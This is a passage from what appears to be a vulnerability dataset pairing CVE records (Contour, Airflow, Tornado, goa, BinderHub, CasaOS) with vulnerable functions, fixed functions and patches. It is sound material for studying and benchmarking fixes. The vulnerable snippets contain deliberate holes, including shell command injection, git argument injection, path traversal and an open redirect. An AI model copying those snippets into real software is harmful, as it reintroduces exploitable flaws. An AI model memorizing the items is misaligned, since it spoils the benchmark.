and we should probably look into doing a DNS\n\t// lookup to check what the externalName resolves to, but I'm worried about the\n\t// performance impact of doing one or more DNS lookups per DAG run, so we're\n\t// going to go with a specific blocklist for now.\n\tlocalhostNames := map[string]struct{}{\n\t\t\"localhost\": {},\n\t\t\"localhost.localdomain\": {},\n\t\t\"local.projectcontour.io\": {},\n\t}\n\n\t_, localhost := localhostNames[en]\n\tif localhost {\n\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service that points to localhost, this is not allowed\", svc.Namespace, svc.Name)\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/internal/dag/accessors.go\n+++ b/internal/dag/accessors.go\n@@ -1,5 +1,10 @@\n-func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache) (*Service, error) {\n+func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache, enableExternalNameSvc bool) (*Service, error) {\n \tsvc, svcPort, err := cache.LookupService(meta, port)\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\terr = validateExternalName(svc, enableExternalNameSvc)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n\n--- /dev/null\n+++ b/internal/dag/accessors.go\n@@ -0,0 +1,31 @@\n+func validateExternalName(svc *v1.Service, enableExternalNameSvc bool) error {\n+\n+\t// If this isn't an ExternalName Service, we're all good here.\n+\ten := externalName(svc)\n+\tif en == \"\" {\n+\t\treturn nil\n+\t}\n+\n+\t// If ExternalNames are disabled, then we don't want to add this to the DAG.\n+\tif !enableExternalNameSvc {\n+\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service, these are not currently enabled. See the config.enableExternalNameService config file setting\", svc.Namespace, svc.Name)\n+\t}\n+\n+\t// Check against a list of known localhost names, using a map to approximate a set.\n+\t// TODO(youngnick) This is a very porous hack, and we should probably look into doing a DNS\n+\t// lookup to check what the externalName resolves to, but I'm worried about the\n+\t// performance impact of doing one or more DNS lookups per DAG run, so we're\n+\t// going to go with a specific blocklist for now.\n+\tlocalhostNames := map[string]struct{}{\n+\t\t\"localhost\": {},\n+\t\t\"localhost.localdomain\": {},\n+\t\t\"local.projectcontour.io\": {},\n+\t}\n+\n+\t_, localhost := localhostNames[en]\n+\tif localhost {\n+\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service that points to localhost, this is not allowed\", svc.Namespace, svc.Name)\n+\t}\n+\n+\treturn nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32783:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/contour\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestBuilderLookupService$ github.com/projectcontour/contour/internal/dag\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-45034", "cve_description": "Apache Airflow versions before 2.10.1 have a vulnerability that allows\u00a0DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. \nUsers are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/03e01e76d2203d37aa645096df195b4328665f6d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_176_1", "commit": "ceb6051", "file_path": "airflow/settings.py", "start_line": 678, "end_line": 690, "snippet": "def prepare_syspath():\n \"\"\"Ensure certain subfolders of AIRFLOW_HOME are on the classpath.\"\"\"\n if DAGS_FOLDER not in sys.path:\n sys.path.append(DAGS_FOLDER)\n\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n if config_path not in sys.path:\n sys.path.append(config_path)\n\n if PLUGINS_FOLDER not in sys.path:\n sys.path.append(PLUGINS_FOLDER)"}, {"id": "vul_py_176_2", "commit": "ceb6051", "file_path": "airflow/settings.py", "start_line": 771, "end_line": 793, "snippet": "def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n prepare_syspath()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n global LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n configure_adapters()\n # The webservers import this file from models.py with the default settings.\n configure_orm()\n configure_action_logging()\n\n # Run any custom runtime checks that needs to be executed for providers\n run_providers_custom_runtime_checks()\n\n # Ensure we close DB connections at scheduler and gunicorn worker terminations\n atexit.register(dispose_orm)"}], "fix_func": [{"id": "fix_py_176_1", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 678, "end_line": 687, "snippet": "def prepare_syspath_for_config_and_plugins():\n \"\"\"Update sys.path for the config and plugins directories.\"\"\"\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n if config_path not in sys.path:\n sys.path.append(config_path)\n\n if PLUGINS_FOLDER not in sys.path:\n sys.path.append(PLUGINS_FOLDER)"}, {"id": "fix_py_176_2", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 774, "end_line": 797, "snippet": "def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n prepare_syspath_for_config_and_plugins()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n prepare_syspath_for_dags_folder()\n global LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n configure_adapters()\n # The webservers import this file from models.py with the default settings.\n configure_orm()\n configure_action_logging()\n\n # Run any custom runtime checks that needs to be executed for providers\n run_providers_custom_runtime_checks()\n\n # Ensure we close DB connections at scheduler and gunicorn worker terminations\n atexit.register(dispose_orm)"}, {"id": "fix_py_176_3", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 690, "end_line": 693, "snippet": "def prepare_syspath_for_dags_folder():\n \"\"\"Update sys.path to include the DAGs folder.\"\"\"\n if DAGS_FOLDER not in sys.path:\n sys.path.append(DAGS_FOLDER)"}], "vul_patch": "--- a/airflow/settings.py\n+++ b/airflow/settings.py\n@@ -1,8 +1,5 @@\n-def prepare_syspath():\n- \"\"\"Ensure certain subfolders of AIRFLOW_HOME are on the classpath.\"\"\"\n- if DAGS_FOLDER not in sys.path:\n- sys.path.append(DAGS_FOLDER)\n-\n+def prepare_syspath_for_config_and_plugins():\n+ \"\"\"Update sys.path for the config and plugins directories.\"\"\"\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n\n--- a/airflow/settings.py\n+++ b/airflow/settings.py\n@@ -1,12 +1,13 @@\n def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n- prepare_syspath()\n+ prepare_syspath_for_config_and_plugins()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n+ prepare_syspath_for_dags_folder()\n global LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n--- /dev/null\n+++ b/airflow/settings.py\n@@ -0,0 +1,4 @@\n+def prepare_syspath_for_dags_folder():\n+ \"\"\"Update sys.path to include the DAGs folder.\"\"\"\n+ if DAGS_FOLDER not in sys.path:\n+ sys.path.append(DAGS_FOLDER)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-28370", "cve_description": "Open redirect vulnerability in Tornado versions 6.3.1 and earlier allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/tornadoweb/tornado", "patch_url": ["https://github.com/tornadoweb/tornado/commit/32ad07c54e607839273b4e1819c347f5c8976b2f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_351_1", "commit": "e0fa53ee96db720dc7800d0248c39a4ffb8911e9", "file_path": "tornado/web.py", "start_line": 2841, "end_line": 2889, "snippet": " def validate_absolute_path(self, root: str, absolute_path: str) -> Optional[str]:\n \"\"\"Validate and return the absolute path.\n\n ``root`` is the configured path for the `StaticFileHandler`,\n and ``path`` is the result of `get_absolute_path`\n\n This is an instance method called during request processing,\n so it may raise `HTTPError` or use methods like\n `RequestHandler.redirect` (return None after redirecting to\n halt further processing). This is where 404 errors for missing files\n are generated.\n\n This method may modify the path before returning it, but note that\n any such modifications will not be understood by `make_static_url`.\n\n In instance methods, this method's result is available as\n ``self.absolute_path``.\n\n .. versionadded:: 3.1\n \"\"\"\n # os.path.abspath strips a trailing /.\n # We must add it back to `root` so that we only match files\n # in a directory named `root` instead of files starting with\n # that prefix.\n root = os.path.abspath(root)\n if not root.endswith(os.path.sep):\n # abspath always removes a trailing slash, except when\n # root is '/'. This is an unusual case, but several projects\n # have independently discovered this technique to disable\n # Tornado's path validation and (hopefully) do their own,\n # so we need to support it.\n root += os.path.sep\n # The trailing slash also needs to be temporarily added back\n # the requested path so a request to root/ will match.\n if not (absolute_path + os.path.sep).startswith(root):\n raise HTTPError(403, \"%s is not in root static directory\", self.path)\n if os.path.isdir(absolute_path) and self.default_filename is not None:\n # need to look at the request.path here for when path is empty\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n if not os.path.exists(absolute_path):\n raise HTTPError(404)\n if not os.path.isfile(absolute_path):\n raise HTTPError(403, \"%s is not a file\", self.path)\n return absolute_path"}], "fix_func": [{"id": "fix_py_351_1", "commit": "32ad07c54e607839273b4e1819c347f5c8976b2f", "file_path": "tornado/web.py", "start_line": 2841, "end_line": 2898, "snippet": " def validate_absolute_path(self, root: str, absolute_path: str) -> Optional[str]:\n \"\"\"Validate and return the absolute path.\n\n ``root`` is the configured path for the `StaticFileHandler`,\n and ``path`` is the result of `get_absolute_path`\n\n This is an instance method called during request processing,\n so it may raise `HTTPError` or use methods like\n `RequestHandler.redirect` (return None after redirecting to\n halt further processing). This is where 404 errors for missing files\n are generated.\n\n This method may modify the path before returning it, but note that\n any such modifications will not be understood by `make_static_url`.\n\n In instance methods, this method's result is available as\n ``self.absolute_path``.\n\n .. versionadded:: 3.1\n \"\"\"\n # os.path.abspath strips a trailing /.\n # We must add it back to `root` so that we only match files\n # in a directory named `root` instead of files starting with\n # that prefix.\n root = os.path.abspath(root)\n if not root.endswith(os.path.sep):\n # abspath always removes a trailing slash, except when\n # root is '/'. This is an unusual case, but several projects\n # have independently discovered this technique to disable\n # Tornado's path validation and (hopefully) do their own,\n # so we need to support it.\n root += os.path.sep\n # The trailing slash also needs to be temporarily added back\n # the requested path so a request to root/ will match.\n if not (absolute_path + os.path.sep).startswith(root):\n raise HTTPError(403, \"%s is not in root static directory\", self.path)\n if os.path.isdir(absolute_path) and self.default_filename is not None:\n # need to look at the request.path here for when path is empty\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n if self.request.path.startswith(\"//\"):\n # A redirect with two initial slashes is a \"protocol-relative\" URL.\n # This means the next path segment is treated as a hostname instead\n # of a part of the path, making this effectively an open redirect.\n # Reject paths starting with two slashes to prevent this.\n # This is only reachable under certain configurations.\n raise HTTPError(\n 403, \"cannot redirect path with two initial slashes\"\n )\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n if not os.path.exists(absolute_path):\n raise HTTPError(404)\n if not os.path.isfile(absolute_path):\n raise HTTPError(403, \"%s is not a file\", self.path)\n return absolute_path"}], "vul_patch": "--- a/tornado/web.py\n+++ b/tornado/web.py\n@@ -39,6 +39,15 @@\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n+ if self.request.path.startswith(\"//\"):\n+ # A redirect with two initial slashes is a \"protocol-relative\" URL.\n+ # This means the next path segment is treated as a hostname instead\n+ # of a part of the path, making this effectively an open redirect.\n+ # Reject paths starting with two slashes to prevent this.\n+ # This is only reachable under certain configurations.\n+ raise HTTPError(\n+ 403, \"cannot redirect path with two initial slashes\"\n+ )\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-25073", "cve_description": "Improper path sanitization in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/goadesign/goa", "patch_url": ["https://github.com/goadesign/goa/commit/70b5a199d0f813d74423993832c424e1fc73fb39"], "programing_language": "Go", "vul_func": [{"id": "vul_go_223_1", "commit": "4f2e802", "file_path": "service.go", "start_line": 366, "end_line": 416, "snippet": "func (ctrl *Controller) FileHandler(path, filename string) Handler {\n\tvar wc string\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\twc = path[idx+2:]\n\t\tif strings.Contains(wc, \"/\") {\n\t\t\twc = \"\"\n\t\t}\n\t}\n\treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n\t\tfname := filename\n\t\tif len(wc) > 0 {\n\t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\t\t\t\tfname = filepath.Join(filename, m[0])\n\t\t\t}\n\t\t}\n\t\tLogInfo(ctx, \"serve file\", \"name\", fname, \"route\", req.URL.Path)\n\t\tdir, name := filepath.Split(fname)\n\t\tfs := ctrl.FileSystem(dir)\n\t\tf, err := fs.Open(name)\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\tdefer f.Close()\n\t\td, err := f.Stat()\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\t// use contents of index.html for directory, if present\n\t\tif d.IsDir() {\n\t\t\tindex := strings.TrimSuffix(name, \"/\") + \"/index.html\"\n\t\t\tff, err := fs.Open(index)\n\t\t\tif err == nil {\n\t\t\t\tdefer ff.Close()\n\t\t\t\tdd, err := ff.Stat()\n\t\t\t\tif err == nil {\n\t\t\t\t\tname = index\n\t\t\t\t\td = dd\n\t\t\t\t\tf = ff\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// serveContent will check modification time\n\t\t// Still a directory? (we didn't find an index.html file)\n\t\tif d.IsDir() {\n\t\t\treturn dirList(rw, f)\n\t\t}\n\t\thttp.ServeContent(rw, req, d.Name(), d.ModTime(), f)\n\t\treturn nil\n\t}\n}"}], "fix_func": [{"id": "fix_go_223_1", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 366, "end_line": 420, "snippet": "func (ctrl *Controller) FileHandler(path, filename string) Handler {\n\tvar wc string\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\twc = path[idx+2:]\n\t\tif strings.Contains(wc, \"/\") {\n\t\t\twc = \"\"\n\t\t}\n\t}\n\treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n\t\t// prevent path traversal\n\t\tif attemptsPathTraversal(req.URL.Path, path) {\n\t\t\treturn ErrNotFound(req.URL.Path)\n\t\t}\n\t\tfname := filename\n\t\tif len(wc) > 0 {\n\t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\t\t\t\tfname = filepath.Join(filename, m[0])\n\t\t\t}\n\t\t}\n\t\tLogInfo(ctx, \"serve file\", \"name\", fname, \"route\", req.URL.Path)\n\t\tdir, name := filepath.Split(fname)\n\t\tfs := ctrl.FileSystem(dir)\n\t\tf, err := fs.Open(name)\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\tdefer f.Close()\n\t\td, err := f.Stat()\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\t// use contents of index.html for directory, if present\n\t\tif d.IsDir() {\n\t\t\tindex := strings.TrimSuffix(name, \"/\") + \"/index.html\"\n\t\t\tff, err := fs.Open(index)\n\t\t\tif err == nil {\n\t\t\t\tdefer ff.Close()\n\t\t\t\tdd, err := ff.Stat()\n\t\t\t\tif err == nil {\n\t\t\t\t\tname = index\n\t\t\t\t\td = dd\n\t\t\t\t\tf = ff\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// serveContent will check modification time\n\t\t// Still a directory? (we didn't find an index.html file)\n\t\tif d.IsDir() {\n\t\t\treturn dirList(rw, f)\n\t\t}\n\t\thttp.ServeContent(rw, req, d.Name(), d.ModTime(), f)\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_223_2", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 422, "end_line": 442, "snippet": "func attemptsPathTraversal(req string, path string) bool {\n\tif !strings.Contains(req, \"..\") {\n\t\treturn false\n\t}\n\n\tcurrentPathIdx := 0\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\treq = req[idx+1:]\n\t}\n\tfor _, runeValue := range strings.FieldsFunc(req, isSlashRune) {\n\t\tif runeValue == \"..\" {\n\t\t\tcurrentPathIdx--\n\t\t\tif currentPathIdx < 0 {\n\t\t\t\treturn true\n\t\t\t}\n\t\t} else {\n\t\t\tcurrentPathIdx++\n\t\t}\n\t}\n\treturn false\n}"}, {"id": "fix_go_223_3", "commit": "70b5a199d0f813d74423993832c424e1fc73fb39", "file_path": "service.go", "start_line": 444, "end_line": 446, "snippet": "func isSlashRune(r rune) bool {\n\treturn os.IsPathSeparator(uint8(r))\n}"}], "vul_patch": "--- a/service.go\n+++ b/service.go\n@@ -7,6 +7,10 @@\n \t\t}\n \t}\n \treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n+\t\t// prevent path traversal\n+\t\tif attemptsPathTraversal(req.URL.Path, path) {\n+\t\t\treturn ErrNotFound(req.URL.Path)\n+\t\t}\n \t\tfname := filename\n \t\tif len(wc) > 0 {\n \t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\n--- /dev/null\n+++ b/service.go\n@@ -0,0 +1,21 @@\n+func attemptsPathTraversal(req string, path string) bool {\n+\tif !strings.Contains(req, \"..\") {\n+\t\treturn false\n+\t}\n+\n+\tcurrentPathIdx := 0\n+\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n+\t\treq = req[idx+1:]\n+\t}\n+\tfor _, runeValue := range strings.FieldsFunc(req, isSlashRune) {\n+\t\tif runeValue == \"..\" {\n+\t\t\tcurrentPathIdx--\n+\t\t\tif currentPathIdx < 0 {\n+\t\t\t\treturn true\n+\t\t\t}\n+\t\t} else {\n+\t\t\tcurrentPathIdx++\n+\t\t}\n+\t}\n+\treturn false\n+}\n\n--- /dev/null\n+++ b/service.go\n@@ -0,0 +1,3 @@\n+func isSlashRune(r rune) bool {\n+\treturn os.IsPathSeparator(uint8(r))\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-39159", "cve_description": "BinderHub is a kubernetes-based cloud service that allows users to share reproducible interactive computing environments from code repositories. In affected versions a remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the BinderHub context, with the potential to egress credentials of the BinderHub deployment, including JupyterHub API tokens, kubernetes service accounts, and docker registry credentials. This may provide the ability to manipulate images and other user created pods in the deployment, with the potential to escalate to the host depending on the underlying kubernetes configuration. Users are advised to update to version 0.2.0-n653. If users are unable to update they may disable the git repo provider by specifying the `BinderHub.repo_providers` as a workaround.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/jupyterhub/binderhub", "patch_url": ["https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182", "https://github.com/jupyterhub/binderhub/commit/195caac172690456dcdc8cc7a6ca50e05abf8182.patch"], "programing_language": "Python", "vul_func": [{"id": "vul_py_193_1", "commit": "034430a", "file_path": "binderhub/repoproviders.py", "start_line": 478, "end_line": 500, "snippet": " async def get_resolved_ref(self):\n if hasattr(self, 'resolved_ref'):\n return self.resolved_ref\n\n try:\n # Check if the reference is a valid SHA hash\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n command = [\"git\", \"ls-remote\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n if not result.stdout:\n return None\n resolved_ref = result.stdout.split(None, 1)[0]\n self.sha1_validate(resolved_ref)\n self.resolved_ref = resolved_ref\n else:\n # The ref already was a valid SHA hash\n self.resolved_ref = self.unresolved_ref\n\n return self.resolved_ref"}], "fix_func": [{"id": "fix_py_193_1", "commit": "195caac", "file_path": "binderhub/repoproviders.py", "start_line": 478, "end_line": 500, "snippet": " async def get_resolved_ref(self):\n if hasattr(self, 'resolved_ref'):\n return self.resolved_ref\n\n try:\n # Check if the reference is a valid SHA hash\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n command = [\"git\", \"ls-remote\", \"--\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n if not result.stdout:\n return None\n resolved_ref = result.stdout.split(None, 1)[0]\n self.sha1_validate(resolved_ref)\n self.resolved_ref = resolved_ref\n else:\n # The ref already was a valid SHA hash\n self.resolved_ref = self.unresolved_ref\n\n return self.resolved_ref"}], "vul_patch": "--- a/binderhub/repoproviders.py\n+++ b/binderhub/repoproviders.py\n@@ -7,7 +7,7 @@\n self.sha1_validate(self.unresolved_ref)\n except ValueError:\n # The ref is a head/tag and we resolve it using `git ls-remote`\n- command = [\"git\", \"ls-remote\", self.repo, self.unresolved_ref]\n+ command = [\"git\", \"ls-remote\", \"--\", self.repo, self.unresolved_ref]\n result = subprocess.run(command, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode:\n raise RuntimeError(\"Unable to run git ls-remote to get the `resolved_ref`: {}\".format(result.stderr))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-37469", "cve_description": "CasaOS is an open-source personal cloud system. Prior to version 0.4.4, if an authenticated user using CasaOS is able to successfully connect to a controlled SMB server, they are able to execute arbitrary commands. Version 0.4.4 contains a patch for the issue.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/IceWhaleTech/CasaOS", "patch_url": ["https://github.com/IceWhaleTech/CasaOS/commit/af440eac5563644854ff33f72041e52d3fd1f47c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_117_1", "commit": "34b4e15", "file_path": "route/v1/samba.go", "start_line": 131, "end_line": 157, "snippet": "func PostSambaConnectionsCreate(c *gin.Context) {\n\tconnection := model.Connections{}\n\tc.ShouldBindJSON(&connection)\n\tif connection.Port == \"\" {\n\t\tconnection.Port = \"445\"\n\t}\n\tif connection.Username == \"\" || connection.Host == \"\" {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n\n\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Password); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Username); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}\n\tif !ip_helper.IsIPv4(connection.Host) && !ip_helper.IsIPv6(connection.Host) {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}\n\tif ok, _ := regexp.MatchString(\"^[0-9]{1,6}$\", connection.Port); !ok {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n\t\treturn\n\t}"}, {"id": "vul_go_117_2", "commit": "34b4e15", "file_path": "service/connections.go", "start_line": 59, "end_line": 62, "snippet": "func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {\n\tstr := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n\treturn str\n}"}], "fix_func": [{"id": "fix_go_117_1", "commit": "af440ea", "file_path": "route/v1/samba.go", "start_line": 129, "end_line": 139, "snippet": "func PostSambaConnectionsCreate(c *gin.Context) {\n\tconnection := model.Connections{}\n\tc.ShouldBindJSON(&connection)\n\tif connection.Port == \"\" {\n\t\tconnection.Port = \"445\"\n\t}\n\tif connection.Username == \"\" || connection.Host == \"\" {\n\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n\t\treturn\n\t}\n"}, {"id": "fix_go_117_2", "commit": "af440ea", "file_path": "service/connections.go", "start_line": 60, "end_line": 71, "snippet": "func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) error {\n\terr := unix.Mount(\n\t\tfmt.Sprintf(\"//%s/%s\", host, directory),\n\t\tmountPoint,\n\t\t\"cifs\",\n\t\tunix.MS_NOATIME|unix.MS_NODEV|unix.MS_NOSUID,\n\t\tfmt.Sprintf(\"username=%s,password=%s\", username, password),\n\t)\n\treturn err\n\t//str := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n\t//return str\n}"}], "vul_patch": "--- a/route/v1/samba.go\n+++ b/route/v1/samba.go\n@@ -8,20 +8,3 @@\n \t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n \t\treturn\n \t}\n-\n-\tif ok, _ := regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Password); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.CHARACTER_LIMIT, Message: common_err.GetMsg(common_err.CHARACTER_LIMIT)})\n-\t\treturn\n-\t}\n-\tif ok, _ 